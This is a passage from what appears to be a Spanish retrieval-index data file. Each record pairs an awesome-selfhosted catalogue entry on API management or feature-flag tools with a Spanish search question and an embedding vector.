0.0216, 0.02619, 0.01662, 0.0072, -0.10019, 0.07487, -0.05753, -0.01512, 0.04995, -0.05629, 0.03312, -0.01142, 0.08835, -0.07414, -0.02069, 0.02471, -0.04139, -0.00064, -0.01999, 0.01196, 0.08203, 0.03704, 0.04721, -0.04794, 0.00447, -0.00125, 0.03808, 0.04297, -0.001, 0.11042, 0.09732, 0.01708, 0.06495, -0.01731, 0.00442, -0.01303, 0.00932, -0.07444, -0.08745, 0.00843, 0.05405, 0.08477, 0.10302, -0.01471, -0.05128, 0.008, -0.02375, 0.01904, -0.11154, -0.00403, -0.00523, 0.02917, -0.01377, -0.03618, 0.03968, -0.00978, -0.06736, -0.04929, -0.00622, 0.04737, -0.03609, 0.03943, -0.08047, 0.15269, -0.00646, 0.10439, -0.0197, 0.00793, -0.05246, 0.03765, 0.06841, 0.02019, 0.11748, -0.03808, 0.0447, -0.01096, -0.03228, 0.06411, -0.02874, 0.07972, -0.00579, -0.08648, 0.10369, -0.02573, -0.04323, -0.04791, 0.00253, -0.01432, -0.03329, 0.05514, -0.11742, -0.06538, 0.02901, -0.06325, -0.07625, 0.03406, 9e-05, 0.04055, -0.0263, 0.0028, 0.09497, -0.04088, 0.05103, -0.01837, 0.09712, 0.10453, -0.0141, 0.10371, 0.0821, -0.13191, 0.0676, 0.03365, -0.07984, -0.08237, -0.02546, -0.07549, -0.04835, -0.00518, 0.08241, 0.04098, 0.01439, -0.01029, -0.0029, -0.01701, -0.02338, -0.0691, -0.08418, 0.12282, 0.04033, -0.05749, 0.05245, -0.08593, -0.04267, -0.02144, 0.0205, -0.04553, -0.07061, 0.02088, -0.02066, -0.00842, -0.03291, 0.06957, -0.00915, -0.06252, 0.04364, 0.03183, -0.01186, 0.00749, 0.07208, 0.01615, -0.01138, -0.03145, 0.01742, 0.0441, 0.04437, 0.03796, -0.06215, 0.00446, 0.00294, 0.00439, -0.01058, -0.00736, 0.04939, -0.01572, -0.00656, 0.00301, 0.00673, -0.07339, 0.01485, -0.02252, -0.00299, -0.0433, -0.07149, -0.02343, 0.01115, -0.08197, 0.00239, 0.0521, -0.05602, -0.07433, 0.02053, 0.02927, -0.07788, 0.04919, 0.01999, -0.04496, -0.08203, -0.00041, 0.05918, -0.02679, -0.00083, 0.02229]} +{"tipo": "pregunta", "herramienta": "Software Development - API Management", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Software Development - API Management", "tema": "software development - api management", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Software Development - API Management: Aastro β€” Extensible API Gateway written in Go [Apache-2.0, Go/Docker]. DreamFactory β€” Turns any SQL/NoSQL/Structured data into Restful API [Apache-2.0, PHP/Docker/K8S]. form.io β€” A REST API building platform that utilizes a drag & drop form builder, and is application framework agnostic. Contains open source and enterprise version [MIT, Nodejs/Docker]. Fusio β€” Open-source API management platform which helps to build and manage REST APIs [AGPL-3.0, PHP/Docker]. Graphweaver β€” Turn multiple data sources into a single GraphQL API [MIT, Nodejs]. Hasura β€” Fast, instant realtime GraphQL APIs on Postgres with fine grained access control, also trigger webhooks on database events [Apache-2.0, Haskell/Docker/K8S]. Hoppscotch Community Edition β€” Fast and beautiful API request builder [MIT, Nodejs/Docker]. Kong β€” Microservice API Gateway and Platform [Apache-2.0, Lua/Docker/K8S/deb]. Lura β€” High-performance API Gateway [Apache-2.0, Go].", "indexar": "cuΓ‘l es una alternativa gratuita a Kong para gestionar microservicios", "v": [-0.15774, -0.01157, 0.01886, -0.06125, 0.02707, -0.10562, -0.10877, 0.05452, -0.21848, -0.15431, -0.02689, -0.17871, 0.2012, -0.0229, 0.08676, -0.06505, 0.12553, -0.0807, 0.05651, 0.0822, 0.04191, 0.01741, 0.03218, -0.03073, -0.032, -0.1115, 0.02075, -0.15835, -0.11208, 0.05605, 0.033, -0.0545, 0.02562, -0.04218, -0.02363, 0.04194, 0.07274, 0.06576, 0.08505, -0.05407, 0.06141, -0.04181, 0.00465, -0.01545, 0.0608, -0.06915, 0.04565, -0.02084, -0.05409, 0.11822, -0.0142, -0.12847, -0.06136, 0.04786, 0.0147, 0.02066, -0.01806, -0.1845, -0.08203, -0.1297, -0.01621, -0.00944, -0.06792, 0.03278, 0.06556, 0.02851, -0.01537, 0.04008, -0.11879, 0.12646, -0.02224, -0.01639, 0.08631, -0.0596, -0.03027, 0.02159, 0.00192, 0.01516, 0.04279, 0.08945, 0.07642, 0.0425, 0.05145, -0.01466, 0.02759, 0.01043, -0.07695, -0.05837, 0.02429, -0.00735, 0.0056, -0.03144, 0.02803, 0.00078, -0.10178, 0.0303, -0.00074, 0.05346, -0.05618, 0.05848, 0.05457, 0.03131, -0.13699, 0.06449, 0.00218, 0.04974, -0.09558, -0.07612, -0.13832, -0.07552, -0.04867, -0.01328, 0.0481, 0.08323, 0.03203, -0.01311, -0.0284, 0.06439, 0.0352, 0.03323, -0.05409, -0.04177, 0.03359, -0.05275, 0.0475, 0.07123, 0.05495, 0.03237, -0.00927, 0.06484, 0.06525, -0.01723, -0.03025, -0.09537, -0.01372, -0.09612, 0.03758, -0.03543, -0.01211, -0.06163, -0.07426, 0.01373, -0.04779, 0.02082, 0.07977, -0.07683, 0.08534, -0.03026, 0.10829, 0.04765, -0.00899, -0.08662, -0.02583, 0.04302, -0.03164, 0.0026, -0.01295, 0.00434, -0.12268, 0.04647, 0.05129, -0.1171, -0.02956, 0.09079, -0.02521, -0.07065, 0.03441, -0.01922, -0.06092, 0.06788, -0.02586, 0.10657, 0.02682, 0.00785, 0.0517, -0.00455, 0.04078, -0.11419, 0.06829, -0.03318, 0.02577, -0.03245, -0.03126, -0.00818, -0.04566, -0.03082, 0.01594, 0.12897, -0.04525, 0.01388, 0.06339, -0.01233, -0.02521, -0.05007, 0.03065, -0.04707, 0.05129, -0.10234, -0.08831, 0.04652, -0.04643, -0.05674, -0.0096, 0.01428, 0.01181, -0.04057, 0.02311, 0.13639, 0.05996, 0.02546, -0.00774, 0.05504, 0.02458, -0.04076, 0.01296, 0.02074, 0.00638, 0.00099, 0.05496, -0.01332, 0.00987, -0.04616, 0.00753, 0.0331, 0.0018, 0.0408, -0.0249, 0.03828, -0.04852, -0.02086, 0.03082, 0.02834, 0.06139, 0.08154, -0.0094, -0.05543, 0.02629, -0.02018, -0.02621, -0.00242, 0.04771, 0.06562, 0.03759, 0.00418, -0.03494, -0.03355, -0.0535, -0.01097, -0.0525, -0.02224, 0.00933, 0.01082, 0.0116, 0.07737, 0.00278, 0.03847]} +{"tipo": "pregunta", "herramienta": "Software Development - API Management", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Software Development - API Management", "tema": "software development - api management", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Software Development - API Management: Aastro β€” Extensible API Gateway written in Go [Apache-2.0, Go/Docker]. DreamFactory β€” Turns any SQL/NoSQL/Structured data into Restful API [Apache-2.0, PHP/Docker/K8S]. form.io β€” A REST API building platform that utilizes a drag & drop form builder, and is application framework agnostic. Contains open source and enterprise version [MIT, Nodejs/Docker]. Fusio β€” Open-source API management platform which helps to build and manage REST APIs [AGPL-3.0, PHP/Docker]. Graphweaver β€” Turn multiple data sources into a single GraphQL API [MIT, Nodejs]. Hasura β€” Fast, instant realtime GraphQL APIs on Postgres with fine grained access control, also trigger webhooks on database events [Apache-2.0, Haskell/Docker/K8S]. Hoppscotch Community Edition β€” Fast and beautiful API request builder [MIT, Nodejs/Docker]. Kong β€” Microservice API Gateway and Platform [Apache-2.0, Lua/Docker/K8S/deb]. Lura β€” High-performance API Gateway [Apache-2.0, Go].", "indexar": "con quΓ© herramienta puedo construir APIs GraphQL rΓ‘pidamente", "v": [-0.20593, 0.05977, -0.02198, -0.16163, 0.04075, -0.06532, 0.1222, -0.0187, -0.14067, 0.00352, 0.0044, 0.01191, -0.08704, 0.01454, 0.15746, 0.04161, -0.043, -0.1458, -0.08536, 0.10715, -0.03509, 0.02298, -0.20714, -0.15597, -0.072, -0.08592, 0.13396, 0.00483, -0.15751, -0.02546, -0.02566, 0.03983, -0.01432, -0.04481, -0.17591, -0.04735, -0.05349, 0.09828, -0.00355, 0.06546, -0.02361, -0.05682, -0.13013, 0.02334, 0.07543, -0.0028, 0.02459, -0.07039, -0.06603, 0.01816, -0.04653, -0.12865, -0.1194, -0.01702, -0.03437, 0.03402, 0.17568, -0.23396, 0.05219, -0.02239, -0.05803, -0.02174, -0.09766, -0.08377, -0.01355, -0.00302, -0.03872, -0.00184, -0.09761, 0.07873, -0.05853, -0.06784, 0.00756, -0.00528, -0.05297, 0.06073, -0.0126, -0.04066, 0.02685, 0.01621, 0.02082, -0.01971, -0.12233, -0.07244, 0.07565, -0.04299, -0.06853, -0.02002, 0.01154, -0.0109, -0.08317, 0.04392, -0.0137, 0.06314, 0.03803, 0.02712, 0.0629, -0.01125, 0.00476, 0.01841, -0.02362, -0.1402, -0.09231, 0.03079, 0.07078, 0.05072, 0.00217, 0.02534, 0.01026, -0.00604, 0.09461, 0.05869, -0.11245, -0.02113, 0.03355, 0.08767, -0.04318, -0.05778, -0.00573, -0.04951, 0.03606, 0.03855, -0.05959, -0.03094, -0.05392, -0.03687, -0.07192, 0.08718, 0.00241, -0.04504, -0.03716, -0.00833, -0.03604, -0.04245, -0.01784, 0.0347, 0.08407, -0.08569, 0.03904, -0.07661, -0.00446, -0.04917, 0.00183, -0.0885, -0.0384, -0.01436, 0.026, -0.07993, -0.01699, -0.024, 0.03967, -0.03084, -0.01703, 0.00076, -0.0657, -0.07673, -0.03106, 0.01431, -0.09838, 0.02454, -0.04675, -0.01166, 0.00402, 0.07307, 0.02878, -0.06787, 0.06015, 0.02553, -0.00419, 0.0149, 0.09225, 0.05853, 0.07731, -0.06584, 0.04093, -0.0458, -0.05623, 0.0271, -0.02937, -0.12506, -0.06751, -0.0805, -0.01884, 0.02583, -0.01946, -0.05862, 0.02991, -0.02926, 0.04952, 0.04661, -0.05401, 0.0925, 0.02505, -0.05165, 0.04728, -0.00956, 0.03788, -0.0767, -0.04051, -0.03101, -0.02168, -0.01075, -0.00238, -0.04673, 0.00758, 0.011, -0.04661, 0.00678, -0.00063, 0.04568, 0.07795, 0.03862, 0.02247, 0.01104, 0.02139, 0.03695, -0.02066, 0.00161, -0.02777, -0.01336, 0.00958, 0.02864, 0.00871, -0.00481, 0.02822, 0.03546, 0.00605, 0.0126, -0.00828, 0.03241, 0.02884, -0.06726, -0.00784, 0.00084, 0.05029, -0.00293, 0.00129, -0.02639, -0.03122, 0.02111, 0.01104, 0.02327, -0.03799, -0.04172, -0.02976, -0.0881, 0.01108, -0.02791, -0.04649, -0.07242, -0.05284, 0.03375, 0.08841, -0.04849, -0.01193, -0.00707]} +{"tipo": "pregunta", "herramienta": "Software Development - API Management", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Software Development - API Management", "tema": "software development - api management", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Software Development - API Management: Opik β€” Evaluate, test, and ship LLM applications with a suite of observability tools to calibrate language model outputs across your dev and production lifecycle [⚠, Apache-2.0, Docker/Python]. Para β€” Flexible and modular backend framework/server for object persistence, API development and authentication [Apache-2.0, Java/Docker]. Svix β€” Open-source webhooks as a service that makes it super easy for API providers to send webhooks [MIT, Docker/Rust]. Tyk β€” Fast and scalable open source API Gateway. Out of the box, Tyk offers an API Management Platform with an API Gateway, API Analytics, Developer Portal and API Management Dashboard [MPL-2.0, Go/Docker/K8S].", "indexar": "que herramienta sirve para evaluar y probar aplicaciones de modelos de lenguaje en el ciclo de desarrollo?", "v": [-0.05423, 0.0154, -0.18194, -0.32149, -0.02898, -0.1082, -0.06379, 0.00799, 0.00675, -0.06112, -0.0268, -0.05966, -0.03162, -0.08958, 0.0371, -0.01656, 0.07572, -0.2, -0.07802, -0.04438, 0.01992, 0.02192, -0.20685, -0.04265, -0.01759, 0.12259, 0.00869, -0.09622, 0.01316, 0.06934, -0.03401, 0.06122, 0.16524, -0.11179, -0.12831, -0.01399, -0.01575, -0.08767, -0.08154, 0.06518, 0.00799, -0.02136, -0.01077, -0.0263, 0.03104, 0.04629, 0.00026, 0.02388, -0.08494, -0.0348, -0.03915, -0.07263, -0.00478, 0.05744, 0.01882, -0.0547, 0.12287, -0.05432, 0.04809, -0.12061, -0.01466, 0.0415, 0.02586, -0.05258, 0.0575, -0.11366, -0.02261, 0.03552, -0.14777, 0.0075, -0.04224, 0.08335, 0.03614, 0.01989, 0.02008, -0.00371, -0.01881, 0.01408, 0.04738, 0.03106, 0.02452, -0.01317, -0.11739, 0.0808, -0.08839, -0.0106, 0.09064, -0.02826, 0.1051, -0.03211, -0.03996, 0.02612, -0.05443, -0.04856, -0.03307, -0.03834, 0.07452, -0.05197, 0.11748, 0.05927, 0.093, -0.15566, -0.04045, 0.03565, -0.10985, 0.05795, 0.09812, -0.05693, -0.048, -0.03353, 0.01057, -0.0018, -0.03106, -0.04119, -0.01039, -0.0005, 0.03871, -0.08621, -0.05427, -0.04283, 0.00647, 0.02504, -0.05863, -0.04426, 0.00305, 0.00865, 0.03825, 0.06036, 0.04869, 0.04127, 0.03732, 0.00781, -0.04152, 0.04662, -0.05609, 0.00097, 0.09964, -0.0301, 0.02611, -0.06181, 0.03211, 0.10105, -0.00708, 0.00125, 0.03993, 0.05347, 0.02645, -0.07214, -0.0386, -0.00027, 0.06631, -0.05373, 0.0288, 0.05294, -0.14789, -0.07971, -0.02258, -0.03311, 0.00283, 0.03234, -0.0313, -0.02093, -0.00525, -0.0028, 0.08255, -0.05671, 0.04795, -0.01451, 0.14827, 0.05891, 0.05471, -0.00389, 0.09294, -0.02687, 0.00574, 0.0287, -0.00366, 0.01327, -0.02569, -0.13661, -0.09272, 0.01453, -0.08834, -0.02939, -0.01056, -0.05529, -0.02167, -0.02639, -0.00787, 0.0499, -0.01249, 0.07175, -0.00954, -0.09625, 0.02341, -0.00786, 0.02111, -0.05063, 0.02125, -0.06925, -0.06353, -0.03139, -0.02285, -0.0371, 0.00192, 0.09946, -0.01408, 0.02782, -0.03168, 0.09537, 0.0582, 0.02784, 0.05306, 0.03901, -0.00277, -0.03017, -0.01075, 0.1035, 0.02018, -0.00312, -0.01736, -0.00367, 0.03417, -0.00439, -0.02155, 0.00031, 0.00054, 0.00044, 0.04789, -0.02765, 0.01142, 0.0144, -0.02186, -0.03299, 0.01086, 0.01773, 0.04914, -0.01121, -0.06555, -0.07535, -0.00784, 0.09156, -0.03312, -0.03183, -0.07143, -0.06693, -0.04967, -0.0189, -0.01135, -0.05543, -0.00641, 0.02602, 0.0444, -0.04874, 0.01749, -0.00809]} +{"tipo": "pregunta", "herramienta": "Software Development - API Management", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Software Development - API Management", "tema": "software development - api management", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Software Development - API Management: Opik β€” Evaluate, test, and ship LLM applications with a suite of observability tools to calibrate language model outputs across your dev and production lifecycle [⚠, Apache-2.0, Docker/Python]. Para β€” Flexible and modular backend framework/server for object persistence, API development and authentication [Apache-2.0, Java/Docker]. Svix β€” Open-source webhooks as a service that makes it super easy for API providers to send webhooks [MIT, Docker/Rust]. Tyk β€” Fast and scalable open source API Gateway. Out of the box, Tyk offers an API Management Platform with an API Gateway, API Analytics, Developer Portal and API Management Dashboard [MPL-2.0, Go/Docker/K8S].", "indexar": "con que puedo crear un servicio abierto de webhooks para proveedores de APIs?", "v": [0.00918, 0.00429, -0.11436, -0.12248, 0.04492, -0.10915, 0.16885, -0.08721, -0.13992, -0.08763, -0.12076, -0.10695, -0.01233, -0.11654, 0.01978, 0.02879, 0.09239, -0.12983, 0.09255, 0.16923, -0.00748, 0.09012, -0.16167, -0.00763, 0.00437, 0.01251, 0.14043, -0.0861, -0.21107, 0.01588, -0.07489, -0.07108, -0.05108, 0.07223, -0.07541, -0.02961, -0.08789, 0.13831, 0.02777, 0.06926, -0.00211, -0.10229, -0.07385, 0.02604, -0.02519, 0.06146, 0.08529, -0.0624, -0.01098, -0.01952, 0.02, -0.14893, -0.21754, 0.01559, -0.01924, 0.05654, 0.03667, -0.14805, -0.00096, 0.0198, -0.02798, -0.03033, -0.05941, -0.13624, 0.01071, -0.05437, -0.07916, 0.08511, -0.05629, 0.08476, -0.05288, -0.1265, 0.00188, -0.01828, 0.00872, 0.12812, -0.10111, -0.09123, -0.04933, 0.09113, 0.07757, 0.05645, 0.04198, -0.01585, 0.06023, -0.05664, -0.03777, 0.0035, 0.04067, -0.02966, 0.03426, 0.10348, -0.03152, 0.07194, 0.00774, 0.02607, 0.0299, -0.04539, -0.00655, -0.01054, -0.06393, 0.02704, -0.0524, 0.04737, 0.06294, 0.03219, 0.10114, -0.04281, -0.01534, -0.02635, 0.0077, -0.00222, -0.03594, -0.02347, 0.00568, -0.01513, -0.03809, -0.01051, 0.01634, 0.03552, 0.00162, -0.02739, 0.0247, 0.05409, -0.05598, 0.01921, -0.07931, 0.02398, 0.01363, -0.01376, 0.0034, -0.01157, -0.08521, 0.04913, 0.07787, 0.04337, 0.11859, -0.01871, 0.06233, 0.01039, -0.00486, -0.03767, -0.01088, 0.02281, 0.03968, -0.06562, -0.02307, -0.06058, -0.06241, -0.02734, -0.03614, 0.03587, -0.0531, -0.01267, -0.15185, -0.0075, -0.04493, -0.07374, -0.00052, 0.03869, -0.01483, 0.04947, 0.01955, 0.0382, -0.00908, 0.06661, -0.02696, -0.01563, 0.01819, -0.01281, -0.04198, 0.03443, -0.00822, -0.0994, 0.06016, 0.03203, -0.06267, -0.05558, 0.01506, -0.05335, -0.03804, -0.09354, -0.07681, 0.07953, -0.05124, -0.06829, 0.01457, 0.00256, -0.03772, 0.01016, -0.05683, -0.00694, -0.02617, 0.01629, 0.08742, -0.0714, -0.01335, -0.02893, -0.09546, -0.08786, -0.06382, 0.00628, 0.02286, -0.04113, -0.07539, 0.01615, -0.00344, 0.04219, 0.00887, 0.0312, 0.06259, -0.00715, 0.08148, -0.07535, 0.04569, -0.01066, 0.05072, -0.03725, 0.00417, 0.04785, -0.05363, -0.02987, -0.02505, -0.00469, 0.04241, 0.0083, 0.02124, -0.01562, -0.01686, 0.02071, -0.03567, -0.0574, -0.02744, -0.04299, 0.01029, -0.00803, 0.01461, -0.01625, 0.02087, 0.02381, 0.0057, 0.04669, -0.083, -0.01988, 0.06348, -0.0827, -0.0483, -0.01199, -0.066, -0.04518, -0.08902, 0.00182, 0.00236, -0.00826, 0.02269, 0.01132]} +{"tipo": "pregunta", "herramienta": "Software Development - API Management", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Software Development - API Management", "tema": "software development - api management", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Software Development - API Management: Opik β€” Evaluate, test, and ship LLM applications with a suite of observability tools to calibrate language model outputs across your dev and production lifecycle [⚠, Apache-2.0, Docker/Python]. Para β€” Flexible and modular backend framework/server for object persistence, API development and authentication [Apache-2.0, Java/Docker]. Svix β€” Open-source webhooks as a service that makes it super easy for API providers to send webhooks [MIT, Docker/Rust]. Tyk β€” Fast and scalable open source API Gateway. Out of the box, Tyk offers an API Management Platform with an API Gateway, API Analytics, Developer Portal and API Management Dashboard [MPL-2.0, Go/Docker/K8S].", "indexar": "cual es una alternativa libre a las plataformas de gestiΓ³n de APIs como Tyk?", "v": [-0.10377, 0.06437, 0.00353, -0.09734, 0.01557, -0.04306, 0.03974, -0.0889, -0.10571, 0.09931, -0.01505, -0.13464, -0.03861, 0.11232, 0.10921, -0.02496, 0.05072, -0.14835, 0.1468, 0.04305, -0.06729, 0.04918, -0.19566, -0.02214, 0.06389, -0.07468, 0.10457, -0.12061, -0.14105, -0.10439, -0.04169, -0.05466, 0.00644, -0.03648, -0.07194, -0.05203, 0.04851, 0.13518, 0.03435, 0.01397, -0.08225, -0.18782, -0.05322, 0.05201, 0.05242, -0.00607, 0.0335, 0.00186, 0.07903, 0.01104, -0.13003, -0.13762, -0.13659, 0.07815, 0.08244, -0.01249, 0.0876, -0.12529, 0.04636, 0.0135, -0.16339, -0.0468, -0.0264, -0.04694, -0.0215, 0.00545, -0.02913, 0.03042, -0.0948, 0.21487, 0.05229, -0.08998, 0.02091, 0.02728, -0.01554, 0.0774, -0.03749, -0.02552, -0.08759, 0.04732, 0.08018, -0.0529, -0.04916, 0.04866, 0.03887, -0.10661, 0.01609, -0.10584, 0.05509, 0.04872, -0.02195, -0.04974, -0.00448, 0.09384, -0.04417, -0.03503, 0.01033, 0.02872, 0.00386, 0.01398, -0.03257, -0.00352, -0.11869, -0.02734, -0.02263, 0.09245, 0.0093, -0.05569, -0.02773, 0.00927, 0.0362, 0.05734, -0.02321, -0.01107, 0.00175, -0.00529, -0.04491, 0.02707, 0.06658, -0.00255, -0.02588, -0.09802, -0.01019, -0.07898, 0.06132, 0.05674, -0.01076, 0.06562, -0.0455, 0.06391, -0.00515, -0.06932, -0.03124, -0.03917, -0.0229, -0.00483, 0.13743, 0.03983, 0.06499, -0.01274, -0.1075, 0.06174, 0.03019, -0.04196, 0.10346, -0.1034, 0.02702, -0.0825, -0.01183, -0.00047, -0.03177, -0.02372, -0.05413, 0.07842, -0.08335, 0.00167, -0.06185, -0.04262, -0.14607, 0.04244, 0.0236, -0.02836, -0.06379, 0.0459, 0.00927, 0.00295, 0.06077, 0.04128, -0.08565, 0.00367, 0.08522, 0.09416, 0.05575, -0.11998, 0.07644, -0.08339, -0.009, -0.0645, 0.02748, -0.01947, -0.02313, -0.05463, -0.07602, 0.0168, -0.01345, -0.05933, -0.01286, -0.02635, 0.00891, 0.04796, -0.03672, 0.03031, -0.04113, -0.06208, 0.05647, -0.02343, -0.00248, -0.0361, -0.04441, -0.02966, -0.05902, 0.00262, 0.00211, -0.05417, -0.05771, 0.00457, -0.02819, 0.0326, 0.03801, 0.01789, 0.04153, 0.03423, 0.04852, 0.00209, 0.00396, -0.03319, 0.02838, -0.0402, -0.00184, -0.00906, -0.03565, 0.02327, -0.01636, 0.03042, 0.00321, 0.07301, 0.04519, 0.01955, -0.01242, 0.0017, 0.01327, -0.04473, 0.015, 0.05615, -0.01957, -0.0168, 0.00621, -0.01564, -0.02523, -0.01011, 0.02391, 0.0597, -0.02926, -0.0373, -0.00478, -0.01901, -0.07503, -0.01063, -0.04053, -0.05648, -0.05946, 0.02474, 0.05244, 0.01437, 0.00513, 0.02664]} +{"tipo": "pregunta", "herramienta": "Software Development - Feature Toggle", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Software Development - Feature Toggle", "tema": "software development - feature toggle", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Software Development - Feature Toggle: Featbit β€” Enterprise-grade feature flag platform that you can self-host [MIT, Docker/K8S]. Flagsmith β€” Dashboard, API and SDKs for adding Feature Flags to your applications (alternative to LaunchDarkly) [BSD-3-Clause, Docker/K8S]. Flipt β€” Feature flag solution with support for multiple data backends (alternative to LaunchDarkly) [GPL-3.0, Docker/K8S/Go]. GO Feature Flag β€” Simple, complete, and lightweight feature flag solution (alternative to LaunchDarkly) [MIT, Go].", "indexar": "que alternativa libre a LaunchDarkly puedo alojar en mi propia infraestructura?", "v": [-0.12982, 0.0649, -0.19293, -0.04326, -0.03973, 0.06467, 0.01646, -0.00159, -0.28426, 0.04819, 0.01895, -0.17848, -0.0255, -0.01687, 0.1162, 0.02791, -0.01553, -0.07149, -0.01316, -0.00799, -0.06238, 0.1154, -0.12642, -0.02178, -0.01259, -0.0965, 0.01784, -0.06836, -0.10383, -0.09363, -0.03359, 0.15674, 0.06781, -0.04195, 0.07005, -0.11871, 0.05928, 0.10012, 0.06391, -0.07061, 0.06716, -0.02305, 0.08749, 0.04752, 0.09116, -0.00476, -0.04299, -0.06945, 0.02622, -0.06297, -0.11672, -0.01702, -0.03253, 0.01814, 0.14039, 0.03383, 0.17804, -0.05921, -0.02993, -0.02036, -0.13284, -0.04021, 0.05513, -0.05524, 0.07974, 0.00401, -0.09153, 0.05153, -0.103, 0.05279, -0.0131, 0.02372, 0.01836, 0.01864, 0.00789, 0.06618, -0.05526, -0.02371, 0.06187, 0.11794, -0.00847, -0.02364, 0.07886, 0.12535, -0.04453, -0.01714, 0.0261, -0.07267, 0.07489, 0.03631, -0.05158, 0.02925, -0.01576, 0.08079, -0.05846, -0.06164, 0.03439, 0.124, 0.00575, 0.0419, -0.01031, 0.10681, -0.04466, 0.03377, 0.09151, -0.03492, 0.02783, -0.03775, -0.06102, -0.00192, 0.01107, 0.10213, 0.05742, -0.12545, -0.0282, 0.00432, -0.0546, -0.02333, -0.0209, -0.01211, -0.07835, -0.12545, -0.01084, -0.07895, -0.01177, 0.04492, -0.01102, 0.03111, 0.01429, 0.04772, 0.06628, 0.03644, -0.03019, -0.04564, -0.1234, 0.01331, -0.02428, -0.0536, 0.06859, 0.02405, 0.02027, 0.00428, 0.01044, -0.05869, -0.07716, 0.05077, -0.01548, -0.10887, 0.00125, -0.09741, -0.05397, -0.00426, -0.04836, 0.06413, -0.09628, 0.02191, 0.09352, -0.01849, -0.00198, 0.13649, 0.02686, -0.01683, -0.05979, 0.04197, -0.03383, 0.03747, -0.05573, -0.04599, -0.03159, 0.06918, -0.03094, 0.04964, 0.03848, -0.00581, 0.00067, -0.06586, -0.03149, -0.03531, -0.0161, -0.02035, -0.06779, -0.03338, -0.11664, -0.00422, -0.02609, -0.01586, -0.06, -0.02511, 0.07609, -0.0013, 0.00221, 0.00981, 0.00794, -0.02049, -0.02898, -0.06658, -0.03144, -0.12903, -0.01167, 0.05636, -0.07018, -0.07469, -0.00666, -0.02289, 0.00411, 0.03295, 0.01035, 0.00104, -0.00759, 0.06045, 0.07063, -0.03288, 0.0955, -0.0509, 0.00279, -0.02447, 0.10057, -0.02032, -0.02167, -0.00123, 0.01986, 0.04914, 0.00113, 0.01327, -0.01353, 0.03879, 0.02983, 0.0059, 0.03195, 0.02888, -0.01037, 0.01769, 0.00165, -0.01674, -0.00556, -0.00493, 0.0365, -0.01293, -0.04794, 0.00249, 0.09727, 0.04746, -0.0537, -0.05737, -0.03047, 0.0061, -0.01695, -0.01874, -0.03676, -0.01583, -0.01636, 0.07953, 0.06907, -0.01578, 0.01843, -0.00529]} +{"tipo": "pregunta", "herramienta": "Software Development - Feature Toggle", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Software Development - Feature Toggle", "tema": "software development - feature toggle", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Software Development - Feature Toggle: Featbit β€” Enterprise-grade feature flag platform that you can self-host [MIT, Docker/K8S]. Flagsmith β€” Dashboard, API and SDKs for adding Feature Flags to your applications (alternative to LaunchDarkly) [BSD-3-Clause, Docker/K8S]. Flipt β€” Feature flag solution with support for multiple data backends (alternative to LaunchDarkly) [GPL-3.0, Docker/K8S/Go]. GO Feature Flag β€” Simple, complete, and lightweight feature flag solution (alternative to LaunchDarkly) [MIT, Go].", "indexar": "cual es una herramienta de feature flags que soporte mΓΊltiples bases de datos y sea compatible con Docker?", "v": [-0.0014, 0.093, -0.12921, -0.18587, -0.06787, -0.10601, -0.04914, -0.03434, -0.08725, -0.03709, -0.10563, -0.10265, -0.05563, -0.14968, 0.045, -0.0043, 0.04266, -0.20977, -0.04755, -0.05369, 0.01783, -0.0532, -0.10148, -0.09608, -0.0926, -0.00643, 0.03075, 0.02212, -0.17272, 0.04917, 0.05732, 4e-05, -0.05627, -0.04304, -0.09026, -0.09358, -0.08981, 0.05321, 0.00671, -0.04042, -0.06732, -0.06178, -0.09839, 0.01945, 0.04708, 0.00461, -0.08843, 0.06329, 0.16098, -0.03571, -0.03508, -0.1057, -0.06412, -0.00281, -0.05161, -0.13668, 0.21312, -0.1175, -0.00477, -0.00839, -0.17768, 0.07426, -0.05162, -0.08925, -0.05459, -0.04307, 0.00751, -0.04812, -0.0241, 0.05829, 0.04913, 0.08966, 0.10188, -0.02854, -0.02409, 0.05932, 0.07132, 0.00093, 0.07639, 0.05514, 0.02433, -0.00973, -0.11526, 0.09512, -0.06239, -0.07388, 0.03228, -0.02035, -0.02176, -0.11526, 0.07605, 0.10497, -0.06955, 0.0406, 0.00481, -0.05037, 0.0057, -0.02166, -0.00644, 0.00561, 0.13456, -0.04922, -0.04621, 0.01328, 0.02073, 0.02137, 0.04284, -0.01846, -0.02002, -0.01389, -0.0185, -0.02998, -0.04564, -0.00864, 0.05373, -0.02325, -0.01178, -0.06377, 0.02623, -0.00838, 0.10859, -0.0346, -0.00609, -0.00298, 0.11599, -0.01595, -0.06527, 0.07514, 0.07333, 0.03273, -0.02958, 0.00918, -0.04357, 0.01534, -0.0087, 0.11357, 0.00537, -0.11222, -0.02212, -0.07773, 0.07152, 0.06701, -0.01824, -0.07491, 0.05065, 0.0103, 0.00458, 0.02413, -0.06332, 0.02323, 0.0041, 0.0282, 0.02564, 0.02274, -0.12366, -0.03913, 0.02121, 0.01445, -0.05791, 0.04296, 0.0009, -0.01523, -0.00061, 0.02762, 0.0185, -0.04574, 0.03106, -0.03362, 0.09468, 0.0776, -0.03234, 0.06915, 0.04683, -0.02375, -0.04886, -0.07267, -0.0357, -0.04256, -0.01631, -0.08332, -0.00459, 0.00652, 0.03113, 0.00201, 0.03677, -0.13323, -0.04007, -0.06297, 0.04933, -0.03679, 0.005, 0.07694, -0.00081, 